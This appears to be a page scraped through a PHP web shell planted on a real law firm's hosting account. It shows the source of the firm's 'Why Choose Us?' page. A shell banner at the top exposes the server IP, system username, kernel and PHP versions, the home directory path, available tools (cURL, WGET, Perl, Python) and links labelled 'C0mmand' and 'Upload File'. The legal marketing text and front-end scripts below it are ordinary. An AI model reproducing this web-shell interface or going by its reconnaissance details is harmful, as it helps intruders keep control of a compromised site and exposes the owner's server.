Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/comlegal/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <?php include 'includes/title.php';?> </head> <body> <div class="page-wrapper"> <!-- Preloader --> <?php include 'includes/header.php';?> <!-- Start main-content --> <section class="page-title" style="background-image: url(images/background/page-title-bg.jpg);"> <div class="auto-container"> <div class="title-outer text-center"> <h1 class="title">Why Choose Us?</h1> <ul class="page-breadcrumb"> <li><a href="index.php">Home</a></li> <li>Why Choose Us?</li> </ul> </div> </div> </section> <!-- end main-content --> <!--Contact Details Start--> <section class="contact-details"> <div class="container "> <div class="row"> <div class="col-xl-12 col-lg-12"> <div class="contact-details__right"> <div class="sec-title"> <span class="sub-title">Why Choose Us?</span> <p> <h4 class="hea">Extensive Experience</h4> Our rich history of handling complex legal issues with vast experience, knowledge and insight, allows us to foresee potential challenges and design strategies that safeguard interests of the organization providing legal solution for availing maximum opportunities. <h4 class="hea">Client-Centric Approach</h4> Our priority is need of our Clients. Accordingly, we extend personalized and effective services. Your success is our motto, and we're committed to stand by your side. <h4 class="hea">Comprehensive Service Range</h4> From incorporation, acquisition & merger to dispute resolution, we offer a wide spectrum of legal & HR services. This allows us to serve as a legal solution, ensuring consistency and quality across your legal and HR requirements while simplifying the system and procedure for the organisation. <h4 class="hea">Legal Consultancy </h4> Ours is one of the recognized corporate law firms in Delhi/ NCR offering legal consultancy services to corporate / commercial organization pertaining to various commercial and industrial sectors. We are committed to offer best solution to their problems in order to ensure its smooth operation and risk mitigation. </p> </div> </div> </div> </div> </div> </section> <!--Contact Details End--> <style> .hea{ margin-top: 19px; } </style> <!-- Map Section--> <section class="map-section"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3503.2740639624803!2d77.309178!3d28.591553899999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390ce5004ce570c9%3A0xb78c1e415665acfb!2sCom%20Legal%20Associates%20LLP!5e0!3m2!1sen!2sin!4v1739395466367!5m2!1sen!2sin" width="100%" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </section> <!--End Map Section--> <?php include 'includes/footer.php';?> <!--End Main Footer --> </div><!-- End Page Wrapper --> <!-- Scroll To Top --> <div class="scroll-to-top scroll-to-target" data-target="html"><span class="fa fa-angle-up"></span></div> <script data-cfasync="false" src="../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/jquery.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.fancybox.js"></script> <script src="js/jquery-ui.js"></script> <script src="js/gsap.min.js"></script> <script src="js/ScrollTrigger.min.js"></script> <script src="js/splitType.js"></script> <script src="js/wow.js"></script> <script src="js/appear.js"></script> <script src="js/script.js"></script> <!-- form submit --> <script src="js/jquery.validate.min.js"></script> <script src="js/jquery.form.min.js"></script> <script> (function($) { $("#contact_form").validate({ submitHandler: function(form) { var form_btn = $(form).find('button[type="submit"]'); var form_result_div = '#form-result'; $(form_result_div).remove(); form_btn.before('<div id="form-result" class="alert alert-success" role="alert" style="display: none;"></div>'); var form_btn_old_msg = form_btn.html(); form_btn.html(form_btn.prop('disabled', true).data("loading-text")); $(form).ajaxSubmit({ dataType: 'json', success: function(data) { if( data.status == 'true' ) { $(form).find('.form-control').val(''); } form_btn.prop('disabled', false).html(form_btn_old_msg); $(form_result_div).html(data.message).fadeIn('slow'); setTimeout(function(){ $(form_result_div).fadeOut('slow') }, 6000); } }); } }); })(jQuery); </script> </body> </html>